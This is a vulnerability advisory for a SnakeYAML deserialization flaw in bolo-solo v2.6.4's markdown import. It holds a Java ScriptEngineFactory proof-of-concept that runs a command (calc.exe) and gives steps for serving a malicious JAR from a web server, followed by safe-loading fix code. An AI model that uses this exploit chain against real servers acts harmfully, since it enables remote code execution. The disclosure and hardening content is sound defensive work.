### Vulnerability Key Information

#### Vulnerability Description

In the stable version bolo-solo v2.6.4, there is a deserialization vulnerability in the `import/markdown` path, caused by unsafe YAML loading.

#### Vulnerable File

- `src/main/java/org/b3log/solo/bolo/prop/BackupService.java`

#### Vulnerability Details

1. **importMarkdo SendsSync() Method**
   - This method reads all `.md` files from the compressed package and retrieves article objects via the `parseArticle()` method.
2. **parseArticle() Method**
   - This method uses YAML to load the content of the read file, but does not use a secure loading approach, leading to a SnakeYAML deserialization vulnerability.
3. **POC (Proof of Concept)**
   - Create a JAR file that launches the local calculator.
   - Place the malicious JAR file on a web server and start a Python web server.
   - Example of a malicious Markdown file POC.

#### Vulnerability Verification

- After successfully triggering the vulnerability, the calculator pops up, indicating a successful attack.

#### POC Code

```java
// Malicious ScriptEngineFactory class
package artsplot;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // Other methods return null
}
```

#### Exploitation Steps

1. Create a JAR file that launches the local calculator.
2. Place the malicious JAR file on a web server and start a Python web server.
3. Package a malicious Markdown document and upload it to the server, triggering the vulnerability via the `import/markdown` feature.

#### Summary

- The deserialization vulnerability exists in the `import/markdown` path of bolo-solo v2.6.4.
- The vulnerability stems from unsafe YAML loading.
- Complete POC code and exploitation steps are provided.
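The loading pattern behind the `parseArticle()` finding and its fix, shown side by side as an added example that is not bolo-solo's own code: `new Yaml()` resolves global `!!` tags to arbitrary classes, while a `SafeConstructor` only builds standard YAML types and rejects any tagged node. The front-matter layout (`---` delimited), the `FrontMatterParser` class, and SnakeYAML 1.33+/2.x (`SafeConstructor(LoaderOptions)`) are assumptions.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

// Hypothetical parser standing in for the article-import code path.
public class FrontMatterParser {

    // Constructed sample inputs: a normal article and one whose front matter
    // carries a global tag (a harmless class here; any !!tag is enough to show the difference).
    static final String BENIGN = "---\ntitle: Hello\ntags: [a, b]\n---\nbody text";
    static final String TAGGED = "---\ntitle: !!java.lang.StringBuilder [x]\n---\nbody text";

    // Returns the YAML block between the first two "---" lines, or "" if absent.
    static String frontMatter(String markdown) {
        String[] parts = markdown.split("(?m)^---[ \\t]*$", 3);
        return parts.length >= 2 ? parts[1] : "";
    }

    // Vulnerable pattern: the default constructor instantiates whatever class a !!tag names,
    // so attacker-controlled front matter drives object construction on the server.
    static Object parseUnsafe(String markdown) {
        return new Yaml().load(frontMatter(markdown));
    }

    // Hardened pattern: SafeConstructor knows only scalars, lists and maps;
    // a global tag raises a YAMLException instead of loading a class.
    @SuppressWarnings("unchecked")
    static Map<String, Object> parseSafe(String markdown) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return (Map<String, Object>) yaml.load(frontMatter(markdown));
    }

    public static void main(String[] args) {
        System.out.println("safe, benign : " + parseSafe(BENIGN));
        try {
            parseSafe(TAGGED);
        } catch (YAMLException e) {
            System.out.println("safe, tagged : rejected (" + e.getClass().getSimpleName() + ")");
        }
        // parseUnsafe(TAGGED) would instead construct a StringBuilder for the title field.
        System.out.println("unsafe, tagged title type: " + ((Map<?, ?>) parseUnsafe(TAGGED)).get("title").getClass());
    }
}
```

The detection check for an import feature like this is the same as the fix: grep the code base for `new Yaml()` with no constructor argument and treat each hit on user-supplied input as a finding.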